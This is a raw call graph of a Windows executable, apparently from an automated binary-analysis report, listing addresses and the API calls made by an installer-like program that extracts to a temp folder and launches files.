40cd24 9196->9199 9197->9189 9198 40cd33 _CxxThrowException 9198->9199 9199->9198 9200 40cd63 ??2@YAPAXI 9199->9200 9201 40cd95 ??3@YAXPAX 9199->9201 9200->9199 9202 40cd79 memcpy 9200->9202 9201->9197 9202->9201 9210 409f10 9204->9210 9213 401cfa 9204->9213 9216 40c7e0 9204->9216 9222 40b880 9204->9222 9205 40cd0e ??3@YAXPAX 9205->9092 9211 401d13 free 9210->9211 9212 409f1a 9211->9212 9212->9205 9214 401d01 VirtualFree 9213->9214 9215 401d12 9213->9215 9214->9215 9215->9205 9217 40c805 9216->9217 9218 401d13 free 9217->9218 9219 40c80e 9218->9219 9220 40c830 9219->9220 9221 40c827 ??3@YAXPAX 9219->9221 9220->9205 9221->9220 9223 40b8a6 9222->9223 9224 401d13 free 9223->9224 9225 40b8cc 9224->9225 9225->9205 9227 40cdda ctype 3 API calls 9226->9227 9228 40e21c 9227->9228 9229 40cdda ctype 3 API calls 9228->9229 9230 40e224 9229->9230 9231 40cdda ctype 3 API calls 9230->9231 9232 40e22c 9231->9232 9497 41382f __set_app_type __p__fmode __p__commode 9498 41389e 9497->9498 9499 4138b2 9498->9499 9500 4138a6 __setusermatherr 9498->9500 9509 4139a6 _controlfp 9499->9509 9500->9499 9502 4138b7 _initterm __getmainargs _initterm 9503 41390b GetStartupInfoA 9502->9503 9505 41393f GetModuleHandleA 9503->9505 9510 406d72 _EH_prolog 9505->9510 9509->9502 9513 405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z 9510->9513 9868 401d21 GetModuleHandleW CreateWindowExW 9513->9868 9516 406d51 MessageBoxA 9518 406d68 exit _XcptFilter 9516->9518 9517 40575f 9517->9516 9519 405779 9517->9519 9520 401458 2 API calls 9519->9520 9521 4057b0 9520->9521 9522 401458 2 API calls 9521->9522 9523 4057bb 9522->9523 9871 4044c6 9523->9871 9528 4027c2 2 API calls 9529 4057f9 9528->9529 9880 402dd6 9529->9880 9531 405802 9894 4043f8 9531->9894 9535 405821 _wtol 9537 405837 9535->9537 9899 404903 #17 9537->9899 9538 4043f8 3 API calls 9539 405867 9538->9539 9540 4058a1 9539->9540 9541 40586d 9539->9541 9543 4043f8 3 API calls 9540->9543 10129 404e99 9541->10129 9544 4058ac 9543->9544 9546 4058b2 9544->9546 9547 4058bd 9544->9547 9545 405874 ??3@YAXPAX 10146 404513 9545->10146 10151 4052a7 9546->10151 9549 4043f8 3 API calls 9547->9549 9553 4058cc 9549->9553 9551 405885 ??3@YAXPAX ??3@YAXPAX 9551->9518 9552 405901 GetModuleFileNameW 9555 405913 9552->9555 9556 405925 9552->9556 9553->9552 9554 401172 2 API calls 9553->9554 9554->9552 9557 408dbf 57 API calls 9555->9557 9558 4043f8 3 API calls 9556->9558 9563 405872 9557->9563 9570 405947 9558->9570 9559 405ae3 9560 4013a9 2 API calls 9559->9560 9561 405af3 9560->9561 9562 4013a9 2 API calls 9561->9562 9567 405b00 9562->9567 9563->9545 9564 405a05 9564->9563 9565 405a38 9564->9565 9569 405a21 _wtol 9564->9569 9566 4043f8 3 API calls 9565->9566 9578 405a97 9566->9578 9568 405b85 9567->9568 9572 401370 2 API calls 9567->9572 9925 4023a0 9568->9925 9569->9565 9570->9559 9570->9563 9570->9564 9570->9565 9577 401526 2 API calls 9570->9577 9574 405b35 9572->9574 9576 401370 2 API calls 9574->9576 9575 401370 2 API calls 9579 405bab ??2@YAPAXI 9575->9579 9583 405b4b 9576->9583 9577->9570 9578->9559 9580 404a97 2 API calls 9578->9580 9581 405bb7 9579->9581 9582 405ac8 9580->9582 9928 40c9d7 9581->9928 9582->9559 9584 4013a9 2 API calls 9582->9584 9585 4013a9 2 API calls 9583->9585 9584->9559 9586 405b75 9585->9586 9588 402187 19 API calls 9586->9588 9590 405b7c 9588->9590 9593 4027c2 2 API calls 9590->9593 9591 405be4 9594 408dbf 57 API calls 9591->9594 9592 405c0a 9931 402823 9592->9931 9593->9568 9594->9563 9598 405c1f 9599 405c25 9598->9599 9600 405c49 9598->9600 9602 408dbf 57 API calls 9599->9602 9601 405cdb 9600->9601 9604 4043f8 3 API calls 9600->9604 9605 40cdda ctype 3 API calls 9601->9605 9603 405c2d ??3@YAXPAX 9602->9603 9603->9563 9606 405c60 9604->9606 9607 405ce3 9605->9607 9606->9601 9616 405c66 9606->9616 9608 405d08 9607->9608 9965 403400 9607->9965 9610 405d11 9608->9610 9611 405cbf ??3@YAXPAX 9608->9611 9614 405d82 9610->9614 9615 405d1d wsprintfW 9610->9615 9621 401458 2 API calls 9610->9621 9624 401370 ??2@YAPAXI ??3@YAXPAX 9610->9624 9626 402187 19 API calls 9610->9626 10185 4032d9 ??2@YAPAXI 9610->10185 10191 40269a ??3@YAXPAX ??3@YAXPAX 9610->10191 9611->9563 9613 405cfd ??3@YAXPAX 9613->9563 9994 404b06 9614->9994 9618 401458 2 API calls 9615->9618 9616->9611 10159 4054c1 9616->10159 9618->9610 9620 405c95 9620->9611 9622 405c9b 9620->9622 9621->9610 9623 408dbf 57 API calls 9622->9623 9625 405ca3 ??3@YAXPAX 9623->9625 9624->9610 9625->9563 9626->9610 9627 406006 9628 404b06 26 API calls 9627->9628 9629 406015 9628->9629 9631 40619d 9629->9631 10217 40244e AllocateAndInitializeSid 9629->10217 10053 4026b0 9631->10053 9636 40624e 10056 4045f4 9636->10056 9638 40603a 9641 401458 2 API calls 9638->9641 9639 402771 2 API calls 9682 4061b5 9639->9682 9643 406042 9641->9643 9646 401458 2 API calls 9643->9646 9644 4062e1 CoInitialize 9652 4026b0 lstrcmpW 9644->9652 9645 406275 9648 4026b0 lstrcmpW 9645->9648 9649 40604a GetCommandLineW 9646->9649 9651 406284 9648->9651 9653 404a97 2 API calls 9649->9653 9650 406250 ??3@YAXPAX 9650->9636 9654 406294 9651->9654 9658 402187 19 API calls 9651->9658 9655 406307 9652->9655 9656 40605a 9653->9656 10226 4041ab 9654->10226 9659 40631b 9655->9659 9662 401370 2 API calls 9655->9662 9660 402771 2 API calls 9656->9660 9657 401458 ??2@YAPAXI ??3@YAXPAX 9657->9682 9658->9654 9664 4041c4 16 API calls 9659->9664 9663 406065 9660->9663 9662->9659 9668 4048a9 2 API calls 9663->9668 9669 406321 9664->9669 9666 4013a9 2 API calls 9666->9682 9667 40421b lstrlenW lstrlenW _wcsnicmp 9675 405d8b 9667->9675 9671 406083 9668->9671 9672 4026b0 lstrcmpW 9669->9672 9670 407ce8 22 API calls 9673 4062b7 9670->9673 9676 4048c7 2 API calls 9671->9676 9677 406330 9672->9677 10229 407a5b ??3@YAXPAX 9673->10229 9674 401370 2 API calls 9674->9682 9675->9627 9675->9667 9699 405f6a _wtol 9675->9699 9726 40614a ??3@YAXPAX 9675->9726 10192 404d50 9675->10192 10203 40464b 9675->10203 9683 406090 9676->9683 9679 406344 9677->9679 9680 406337 _wtol 9677->9680 9684 40636a 9679->9684 10230 408f81 9679->10230 9680->9679 9681 4062c2 ??3@YAXPAX 9681->9563 9682->9636 9682->9639 9682->9650 9682->9657 9682->9666 9682->9674 9685 4032d9 7 API calls 9682->9685 10225 40269a ??3@YAXPAX ??3@YAXPAX 9682->10225 9686 4048c7 2 API calls 9683->9686 9689 40637e 9684->9689 9691 406355 ??3@YAXPAX 9684->9691 10246 408eb4 9684->10246 9685->9682 9687 40609d 9686->9687 10220 4048e5 9687->10220 9701 401458 2 API calls 9689->9701 9705 406503 ??3@YAXPAX 9689->9705 9706 4063bc GetKeyState 9689->9706 9710 406563 9689->9710 9711 401370 ??2@YAPAXI ??3@YAXPAX 9689->9711 9712 4026b0 lstrcmpW 9689->9712 9718 401526 ??2@YAPAXI ??3@YAXPAX 9689->9718 9727 406520 9689->9727 9729 406553 ??3@YAXPAX ??3@YAXPAX 9689->9729 9730 4064f8 ??3@YAXPAX 9689->9730 10273 408461 9689->10273 10286 4084df 9689->10286 9691->9684 9695 40622b ??3@YAXPAX 9697 4026b0 lstrcmpW 9695->9697 9696 401551 2 API calls 9698 4060b7 9696->9698 9697->9682 9700 4013a9 2 API calls 9698->9700 9699->9675 9703 4060c3 7 API calls 9700->9703 9701->9689 9704 404f67 9 API calls 9703->9704 9707 40610c 9704->9707 9705->9563 9706->9689 9708 406116 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9707->9708 9709 406167 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9707->9709 9708->9563 9709->9545 9709->9563 9713 406599 9710->9713 9714 40656b 9710->9714 9711->9689 9712->9689 9716 40133e 2 API calls 9713->9716 10062 404545 9714->10062 9719 4065a7 9716->9719 9718->9689 9723 4041c4 16 API calls 9719->9723 9722 4013a9 2 API calls 9724 406588 ??3@YAXPAX 9722->9724 9725 4065b0 9723->9725 9734 4065d0 9724->9734 9728 4065c1 ??3@YAXPAX 9725->9728 9732 4013a9 2 API calls 9725->9732 9726->9563 9731 408dbf 57 API calls 9727->9731 9728->9734 9729->9563 9730->9689 9733 40652c ??3@YAXPAX ??3@YAXPAX 9731->9733 9732->9728 9733->9563 9735 40661a 9734->9735 9736 40660d 9734->9736 10294 40851f 9735->10294 10075 40172c ??2@YAPAXI 9736->10075 9739 406616 9740 406657 9739->9740 9741 40662c 9739->9741 9742 4045f4 22 API calls 9740->9742 10302 4044b0 9741->10302 9743 40665c 9742->9743 9746 406c4d 9743->9746 9747 401458 2 API calls 9743->9747 9749 406cc5 9746->9749 9750 4026b0 lstrcmpW 9746->9750 9748 40667a 9747->9748 9793 40668d 9748->9793 10306 404a41 9748->10306 9752 406d08 ??3@YAXPAX ??3@YAXPAX 9749->9752 9758 4026b0 lstrcmpW 9749->9758 9756 406c7e 9750->9756 9753 406d21 9752->9753 9754 406d27 ??3@YAXPAX 9752->9754 9753->9754 9757 404513 4 API calls 9754->9757 9755 401458 ??2@YAPAXI ??3@YAXPAX 9755->9793 9756->9749 10373 404497 9756->10373 9759 406d38 ??3@YAXPAX ??3@YAXPAX 9757->9759 9760 406ce4 9758->9760 9759->9518 9760->9752 9763 406cf1 9760->9763 9767 40133e 2 API calls 9763->9767 9764 4066bc 9768 406ae3 ??3@YAXPAX ??3@YAXPAX 9764->9768 9769 4066c9 9764->9769 9765 4026b0 lstrcmpW 9765->9793 9766 407ce8 22 API calls 9771 406cba 9766->9771 9773 406d00 9767->9773 9772 406bec 9768->9772 9770 4048c7 2 API calls 9769->9770 9774 4066e5 9770->9774 10376 407a5b ??3@YAXPAX 9771->10376 9777 406c44 ??3@YAXPAX 9772->9777 9782 4045f4 22 API calls 9772->9782 10377 405304 9773->10377 9780 4048c7 2 API calls 9774->9780 9775 406729 9781 401370 2 API calls 9775->9781 9777->9746 9784 4066f2 9780->9784 9785 406732 9781->9785 9783 406bfb 9782->9783 10363 404dae 9783->10363 9787 4013a9 2 API calls 9784->9787 9789 4041f8 20 API calls 9785->9789 9792 4066fe ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9787->9792 9788 406b49 ??3@YAXPAX ??3@YAXPAX 9788->9772 9806 40673b 9789->9806 9790 401370 2 API calls 9790->9793 9791 406c14 SetCurrentDirectoryW 9794 404dae 4 API calls 9791->9794 9795 406725 9792->9795 9796 406afa 9792->9796 9793->9755 9793->9764 9793->9765 9793->9775 9793->9788 9793->9790 9797 401526 2 API calls 9793->9797 9798 406c3c 9794->9798 9795->9775 9799 4044b0 16 API calls 9796->9799 9800 4067c9 ??3@YAXPAX ??3@YAXPAX 9797->9800 9801 4044b0 16 API calls 9798->9801 9802 406aff 9799->9802 9800->9793 9801->9777 9803 408dbf 57 API calls 9802->9803 9804 406b08 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9803->9804 9804->9563 9805 406b3e 9804->9805 9805->9563 9807 406868 _wtol 9806->9807 9808 404255 lstrlenW lstrlenW _wcsnicmp 9806->9808 9809 40692c 9806->9809 9807->9806 9808->9806 9810 406935 9809->9810 9811 406987 9809->9811 9812 40695a 9810->9812 9813 40693b 9810->9813 9814 4013a9 2 API calls 9811->9814 9815 401370 2 API calls 9812->9815 9816 401370 2 API calls 9813->9816 9817 406985 9814->9817 9819 406958 9815->9819 9818 406946 9816->9818 9820 4027c2 2 API calls 9817->9820 9822 4027c2 2 API calls 9818->9822 9821 4026b0 lstrcmpW 9819->9821 9823 406999 9820->9823 9825 40696f 9821->9825 9824 40694f 9822->9824 9826 401458 2 API calls 9823->9826 9827 4027c2 2 API calls 9824->9827 9825->9823 9830 4027c2 2 API calls 9825->9830 9828 4069a1 9826->9828 9827->9819 9829 404a97 2 API calls 9828->9829 9831 4069ae 9829->9831 9830->9817 9832 402771 2 API calls 9831->9832 9833 4069b9 9832->9833 9834 4041f8 20 API calls 9833->9834 9835 4069c2 9834->9835 9836 406a9d 9835->9836 10092 40241d 9835->10092 9837 406bcb ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9836->9837 9839 406ab1 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9836->9839 9837->9772 9839->9768 9840 4069d7 9840->9836 9841 4069f1 9840->9841 9843 4027c2 2 API calls 9840->9843 9842 4041f8 20 API calls 9841->9842 9844 406a09 9842->9844 9843->9841 9845 406a10 9844->9845 9846 406a7f 9844->9846 10101 4048a9 9845->10101 10315 40503e 9846->10315 9850 406a8d 9851 406b68 SetLastError 9850->9851 9852 406a98 9850->9852 9855 406b6f 9851->9855 10360 4023b5 9852->10360 9857 408dbf 57 API calls 9855->9857 9859 406b79 9857->9859 9858 401551 2 API calls 9860 406a45 ??3@YAXPAX ??3@YAXPAX 9858->9860 9861 4044b0 16 API calls 9859->9861 10111 404f67 9860->10111 9863 406b7e 7 API calls 9861->9863 9865 406bbe 9863->9865 9864 406a69 9866 406b60 ??3@YAXPAX 9864->9866 9867 406a77 ??3@YAXPAX 9864->9867 9865->9837 9866->9855 9867->9852 9869 401d56 SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9868->9869 9870 401d89 GetVersionExW 9868->9870 9869->9870 9870->9516 9870->9517 9872 401172 2 API calls 9871->9872 9873 4044db GetCommandLineW 9872->9873 9874 404a97 9873->9874 9875 404ad1 9874->9875 9876 404aa5 9874->9876 9877 404ac9 9875->9877 9878 401526 2 API calls 9875->9878 9876->9877 9879 401526 2 API calls 9876->9879 9877->9528 9878->9875 9879->9876 9881 401458 2 API calls 9880->9881 9887 402de6 9881->9887 9882 402ecc 9883 4013a9 2 API calls 9882->9883 9884 402ed9 ??3@YAXPAX 9883->9884 9884->9531 9885 401526 ??2@YAPAXI ??3@YAXPAX 9885->9887 9887->9882 9887->9885 9888 401458 2 API calls 9887->9888 9890 4013a9 2 API calls 9887->9890 10416 40283b 9887->10416 10419 402ad8 9887->10419 9888->9887 9891 402e46 ??3@YAXPAX 9890->9891 9892 401429 2 API calls 9891->9892 9893 402e5b ??3@YAXPAX ??3@YAXPAX 9892->9893 9893->9887 9895 404407 9894->9895 9896 404421 lstrlenW lstrlenW 9895->9896 9897 404444 9895->9897 10430 401c74 9896->10430 9897->9535 9897->9537 9900 40491a 9899->9900 9901 402131 3 API calls 9900->9901 9902 40491f 9901->9902 9903 402187 19 API calls 9902->9903 9904 404926 9903->9904 9905 402187 19 API calls 9904->9905 9906 404932 9905->9906 9907 402187 19 API calls 9906->9907 9908 40493e 9907->9908 9909 402187 19 API calls 9908->9909 9910 40494a 9909->9910 9911 402187 19 API calls 9910->9911 9912 404956 9911->9912 9913 402187 19 API calls 9912->9913 9914 404962 9913->9914 9915 402187 19 API calls 9914->9915 9921 40496e 9915->9921 9916 404989 SHGetSpecialFolderPathW 9917 4049a3 wsprintfW 9916->9917 9916->9921 9919 401458 2 API calls 9917->9919 9918 404a3c 9918->9538 9919->9921 9920 401458 2 API calls 9920->9921 9921->9916 9921->9918 9921->9920 9923 401370 ??2@YAPAXI ??3@YAXPAX 9921->9923 9924 4032d9 7 API calls 9921->9924 10440 40269a ??3@YAXPAX ??3@YAXPAX 9921->10440 9923->9921 9924->9921 10441 40236f LoadLibraryA GetProcAddress 9925->10441 9927 4023a5 9927->9575 10444 40c9b5 9928->10444 9932 40250f 2 API calls 9931->9932 9933 402837 9932->9933 9934 403c93 9933->9934 9935 40236f 3 API calls 9934->9935 9936 403ca1 9935->9936 9937 402823 2 API calls 9936->9937 9938 403cda 9937->9938 9939 402823 2 API calls 9938->9939 9940 403ce2 9939->9940 9941 402823 2 API calls 9940->9941 9942 403cea 9941->9942 10450 403ba2 9942->10450 9948 403d27 9949 403d80 9948->9949 9951 403ba2 7 API calls 9948->9951 9954 402bee 10 API calls 9948->9954 9958 402989 2 API calls 9948->9958 10496 402953 9948->10496 9950 403ba2 7 API calls 9949->9950 9952 403d96 9950->9952 9951->9948 9953 402bee 10 API calls 9952->9953 9955 403da8 9953->9955 9954->9948 10493 402989 9955->10493 9958->9948 9959 403e1e ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9959->9598 9960 403ba2 7 API calls 9962 403dbe 9960->9962 9961 402bee 10 API calls 9961->9962 9962->9959 9962->9960 9962->9961 9963 402953 2 API calls 9962->9963 9964 402989 2 API calls 9962->9964 9963->9962 9964->9962 9966 402823 2 API calls 9965->9966 9987 403415 9966->9987 9967 4036b4 ??3@YAXPAX 9968 4036eb 9967->9968 9968->9608 9968->9613 9969 401458 ??2@YAPAXI ??3@YAXPAX 9969->9987 9970 402823 2 API calls 9970->9987 9971 4013a9 2 API calls 9972 403486 ??3@YAXPAX ??3@YAXPAX 9971->9972 9973 4036c0 9972->9973 9972->9987 10535 402d30 9973->10535 9977 4036e1 ??3@YAXPAX 9977->9968 9978 403593 strncmp 9979 40357e strncmp 9978->9979 9978->9987 9979->9978 9979->9987 9982 402ad8 ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9982->9987 9983 4013a9 2 API calls 9984 403600 ??3@YAXPAX 9983->9984 9986 402dd6 9 API calls 9984->9986 9985 40292b 2 API calls 9985->9979 9988 403611 lstrcmpW 9986->9988 9987->9967 9987->9969 9987->9970 9987->9971 9987->9973 9987->9978 9987->9982 9987->9983 9987->9985 9989 40292b ??2@YAPAXI ??3@YAXPAX 9987->9989 9990 403648 lstrlenW wcsncmp 9987->9990 9992 4032d9 7 API calls 9987->9992 9993 401370 2 API calls 9987->9993 10526 402662 9987->10526 10530 40261a 9987->10530 10534 40269a ??3@YAXPAX ??3@YAXPAX 9987->10534 9988->9987 9989->9987 9990->9987 9992->9987 9993->9987 9995 4026b0 lstrcmpW 9994->9995 9996 404b1f 9995->9996 9997 404b6f 9996->9997 9999 401370 2 API calls 9996->9999 9998 4026b0 lstrcmpW 9997->9998 10000 404b8d 9998->10000 10001 404b36 9999->10001 10003 4026b0 lstrcmpW 10000->10003 10002 402187 19 API calls 10001->10002 10004 404b3d 10002->10004 10005 404ba5 10003->10005 10006 4027c2 2 API calls 10004->10006 10008 4026b0 lstrcmpW 10005->10008 10007 404b46 10006->10007 10009 401370 2 API calls 10007->10009 10010 404bbd 10008->10010 10011 404b5f 10009->10011 10013 4026b0 lstrcmpW 10010->10013 10012 402187 19 API calls 10011->10012 10014 404b66 10012->10014 10015 404bd5 10013->10015 10016 4027c2 2 API calls 10014->10016 10017 404bec 10015->10017 10018 404bdc lstrcmpiW 10015->10018 10016->9997 10019 4026b0 lstrcmpW 10017->10019 10018->10017 10020 404c02 10019->10020 10021 4026b0 lstrcmpW 10020->10021 10022 404c2f 10021->10022 10023 404c3c 10022->10023 10554 4043a6 10022->10554 10025 4026b0 lstrcmpW 10023->10025 10029 404c50 10025->10029 10026 404c70 10028 4026b0 lstrcmpW 10026->10028 10035 404c83 10028->10035 10029->10026 10030 4026b0 lstrcmpW 10029->10030 10558 40434d 10029->10558 10030->10029 10031 404ca3 10032 4026b0 lstrcmpW 10031->10032 10034 404caf 10032->10034 10036 4026b0 lstrcmpW 10034->10036 10035->10031 10037 4026b0 lstrcmpW 10035->10037 10562 40437e 10035->10562 10038 404cc0 10036->10038 10037->10035 10039 4026b0 lstrcmpW 10038->10039 10040 404cd1 10039->10040 10041 404ce7 10040->10041 10042 404cde _wtol 10040->10042 10043 4026b0 lstrcmpW 10041->10043 10042->10041 10044 404cf3 10043->10044 10045 404d03 10044->10045 10046 404cfa _wtol 10044->10046 10047 4026b0 lstrcmpW 10045->10047 10046->10045 10048 404d0f 10047->10048 10049 4026b0 lstrcmpW 10048->10049 10050 404d27 10049->10050 10051 4026b0 lstrcmpW 10050->10051 10052 404d3f 10051->10052 10052->9675 10054 40261a lstrcmpW 10053->10054 10055 4026c1 10054->10055 10055->9682 10057 404648 10056->10057 10059 404605 10056->10059 10057->9644 10057->9645 10058 40133e 2 API calls 10058->10059 10059->10058 10060 4041f8 20 API calls 10059->10060 10061 404622 SetEnvironmentVariableW ??3@YAXPAX 10060->10061 10061->10057 10061->10059 10063 401458 2 API calls 10062->10063 10064 404556 10063->10064 10065 4027aa 2 API calls 10064->10065 10066 40455f GetTempPathW 10065->10066 10067 404578 10066->10067 10072 40458f 10066->10072 10068 4027aa 2 API calls 10067->10068 10069 404583 GetTempPathW 10068->10069 10069->10072 10070 4027aa 2 API calls 10071 4045b2 wsprintfW 10070->10071 10071->10072 10072->10070 10073 4045c9 GetFileAttributesW 10072->10073 10074 4045ed 10072->10074 10073->10072 10073->10074 10074->9722 10076 401745 10075->10076 10091 40d041 3 API calls 10076->10091 10077 401769 10078 401794 10077->10078 10570 40110a 10077->10570 10080 408dbf 57 API calls 10078->10080 10084 40179c 10080->10084 10082 4017bc 10083 4017d4 ??2@YAPAXI 10082->10083 10085 4036f1 88 API calls 10082->10085 10086 4017e0 10083->10086 10087 4017e7 10083->10087 10084->9739 10088 4017cf 10085->10088 10593 401470 10086->10593 10574 401611 10087->10574 10088->10083 10088->10084 10091->10077 10093 402426 10092->10093 10094 40242b 10092->10094 10093->9840 10095 40236f 3 API calls 10094->10095 10096 402430 10095->10096 10097 402441 10096->10097 10098 40243a 10096->10098 10097->9840 11011 4023e9 LoadLibraryA GetProcAddress 10098->11011 10102 4044c6 2 API calls 10101->10102 10103 4048b7 10102->10103 10104 401429 2 API calls 10103->10104 10105 4048c2 10104->10105 10106 4048c7 10105->10106 10107 40133e 2 API calls 10106->10107 10108 4048d5 10107->10108 10109 4027c2 2 API calls 10108->10109 10110 4048e0 10109->10110 10110->9858 10112 401458 2 API calls 10111->10112 10113 404f78 10112->10113 10114 401458 2 API calls 10113->10114 10115 404f80 memset 10114->10115 10116 404fae 10115->10116 10117 404a97 2 API calls 10116->10117 10118 404fd1 10117->10118 10119 401370 2 API calls 10118->10119 10120 404fdc 10119->10120 10121 404fe1 ??3@YAXPAX 10120->10121 10122 404ffa ShellExecuteExW 10120->10122 10123 404fec ??3@YAXPAX 10121->10123 10124 405014 10122->10124 10125 40503a 10122->10125 10123->9864 10126 405028 CloseHandle 10124->10126 10127 40501d WaitForSingleObject 10124->10127 10128 405031 ??3@YAXPAX 10125->10128 10126->10128 10127->10126 10128->10123 10130 407c87 4 API calls 10129->10130 10131 404eb5 10130->10131 10132 402187 19 API calls 10131->10132 10133 404ec3 10132->10133 10134 402771 2 API calls 10133->10134 10135 404ecd 10134->10135 10136 404f03 wsprintfW 10135->10136 10138 4027c2 ??2@YAPAXI ??3@YAXPAX 10135->10138 10137 4027c2 2 API calls 10136->10137 10139 404f31 10137->10139 10138->10135 10140 4027c2 2 API calls 10139->10140 10141 404f3e 10140->10141 10142 407ce8 22 API calls 10141->10142 10143 404f53 ??3@YAXPAX 10142->10143 11013 407a5b ??3@YAXPAX 10143->11013 10145 404f64 10145->9563 10147 40cdda ctype 3 API calls 10146->10147 10148 404521 10147->10148 10149 40ccfd ctype 3 API calls 10148->10149 10150 40ce45 ??3@YAXPAX 10149->10150 10150->9551 10152 4052b4 10151->10152 10158 4052d0 10151->10158 10155 4052c6 _wtol 10152->10155 10152->10158 10153 404f67 9 API calls 10154 4052f3 10153->10154 10156 405301 10154->10156 10157 4052fb GetLastError 10154->10157 10155->10158 10156->9563 10157->10156 10158->10153 10160 40ca5c 2 API calls 10159->10160 10161 4054ed 10160->10161 10162 405549 10161->10162 10164 402771 2 API calls 10161->10164 10163 402823 2 API calls 10162->10163 10165 405551 10163->10165 10170 4054fc 10164->10170 10166 4028b9 2 API calls 10165->10166 10167 40555e 10166->10167 10168 402953 2 API calls 10167->10168 10172 40556b 10168->10172 10169 4055ba ??3@YAXPAX 10175 4055b6 10169->10175 10170->10169 10171 4036f1 88 API calls 10170->10171 10173 405520 10171->10173 10174 402953 2 API calls 10172->10174 10173->10169 10177 40ca5c 2 API calls 10173->10177 10176 405578 10174->10176 10175->9620 10178 402953 2 API calls 10176->10178 10180 40553c 10177->10180 10179 405585 10178->10179 10181 40d0a5 2 API calls 10179->10181 10180->10169 10182 405540 ??3@YAXPAX 10180->10182 10183 405599 10181->10183 10182->10162 10183->10169 10184 4055a2 ??3@YAXPAX 10183->10184 10184->10175 10186 4032e8 10185->10186 10188 4032f3 10185->10188 11014 4029b7 10186->11014 10189 4107a2 4 API calls 10188->10189 10190 4032ff 10189->10190 10190->9610 10191->9610 10193 402771 2 API calls 10192->10193 10194 404d62 10193->10194 10195 4027c2 2 API calls 10194->10195 10196 404d6f 10195->10196 10197 404d8b 10196->10197 10198 401526 2 API calls 10196->10198 10199 4027c2 2 API calls 10197->10199 10198->10196 10200 404d95 10199->10200 10201 40464b 94 API calls 10200->10201 10202 404da0 ??3@YAXPAX 10201->10202 10202->9675 10204 404662 lstrlenW 10203->10204 10205 40468e 10203->10205 10206 401c74 CharUpperW 10204->10206 10205->9675 10207 404678 10206->10207 10207->10204 10207->10205 10208 404695 10207->10208 10209 402771 2 API calls 10208->10209 10212 40469e 10209->10212 11019 402b20 10212->11019 10213 403400 87 API calls 10214 40470c 10213->10214 10215 404716 ??3@YAXPAX ??3@YAXPAX 10214->10215 10216 40472d ??3@YAXPAX ??3@YAXPAX 10214->10216 10215->10205 10216->10205 10218 402491 CheckTokenMembership FreeSid 10217->10218 10219 4024ab 10217->10219 10218->10219 10219->9631 10219->9638 10221 40133e 2 API calls 10220->10221 10222 4048f3 10221->10222 10223 401526 2 API calls 10222->10223 10224 4048fe 10223->10224 10224->9696 10225->9695 10227 407c87 4 API calls 10226->10227 10228 4041b3 10227->10228 10228->9670 10229->9681 10234 409205 10230->10234 10243 408fa0 10230->10243 10231 4026b0 lstrcmpW 10231->10243 10232 407c87 4 API calls 10232->10243 10233 40851f 25 API calls 10233->10243 10234->9691 10235 4084df 25 API calls 10235->10243 10236 408461 25 API calls 10236->10243 10238 4041ab 4 API calls 10238->10243 10240 402187 19 API calls 10240->10243 10241 408dbf 57 API calls 10241->10243 10242 404497 4 API calls 10242->10243 10243->10231 10243->10232 10243->10233 10243->10234 10243->10235 10243->10236 10243->10238 10243->10240 10243->10241 10243->10242 10244 408d52 27 API calls 10243->10244 10245 407ce8 22 API calls 10243->10245 11029 407d62 10243->11029 11033 407a5b ??3@YAXPAX 10243->11033 10244->10243 10245->10243 10247 4026b0 lstrcmpW 10246->10247 10248 408ec8 10247->10248 10249 408ed6 10248->10249 11034 401bdf GetStdHandle WriteFile 10248->11034 10251 408ee9 10249->10251 11035 401bdf GetStdHandle WriteFile 10249->11035 10253 408efe 10251->10253 11036 401bdf GetStdHandle WriteFile 10251->11036 10257 408f0f 10253->10257 11037 401bdf GetStdHandle WriteFile 10253->11037 10256 4026b0 lstrcmpW 10258 408f1c 10256->10258 10257->10256 10259 408f2a 10258->10259 11038 401bdf GetStdHandle WriteFile 10258->11038 10260 4026b0 lstrcmpW 10259->10260 10262 408f37 10260->10262 10263 408f45 10262->10263 11039 401bdf GetStdHandle WriteFile 10262->11039 10265 4026b0 lstrcmpW 10263->10265 10266 408f52 10265->10266 10267 408f60 10266->10267 11040 401bdf GetStdHandle WriteFile 10266->11040 10269 4026b0 lstrcmpW 10267->10269 10270 408f6d 10269->10270 10271 408f7d 10270->10271 11041 401bdf GetStdHandle WriteFile 10270->11041 10271->9684 10274 408484 10273->10274 10275 4084b7 10274->10275 10276 408499 10274->10276 11045 407e6c 10275->11045 11042 407e3a 10276->11042 10281 407ce8 22 API calls 10283 4084b2 10281->10283 10282 407ce8 22 API calls 10282->10283 11048 407a5b ??3@YAXPAX 10283->11048 10285 4084da 10285->9689 10287 4084f4 10286->10287 10288 407e53 4 API calls 10287->10288 10289 4084ff 10288->10289 10290 407ce8 22 API calls 10289->10290 10291 408510 10290->10291 11052 407a5b ??3@YAXPAX 10291->11052 10293 40851a 10293->9689 10295 408532 10294->10295 11053 407e85 10295->11053 10298 407ce8 22 API calls 10299 408567 10298->10299 11056 407a5b ??3@YAXPAX 10299->11056 10301 408571 10301->9739 10303 4044c4 ??3@YAXPAX ??3@YAXPAX 10302->10303 10304 4044b9 10302->10304 10303->9563 10305 402ff3 16 API calls 10304->10305 10305->10303 10307 4026b0 lstrcmpW 10306->10307 10308 404a60 10307->10308 10309 404a95 10308->10309 10310 401370 2 API calls 10308->10310 10309->9793 10311 404a6f 10310->10311 10312 4041f8 20 API calls 10311->10312 10313 404a75 10312->10313 10313->10309 10314 401526 2 API calls 10313->10314 10314->10309 10316 401458 2 API calls 10315->10316 10317 405053 10316->10317 10318 401458 2 API calls 10317->10318 10319 40505b GetCommandLineW 10318->10319 10320 404a97 2 API calls 10319->10320 10321 40506b 10320->10321 10322 4048a9 2 API calls 10321->10322 10323 40509e 10322->10323 10324 4048c7 2 API calls 10323->10324 10325 4050ab 10324->10325 10326 4048c7 2 API calls 10325->10326 10327 4050b8 10326->10327 10328 4048e5 2 API calls 10327->10328 10329 4050c5 10328->10329 10330 4048e5 2 API 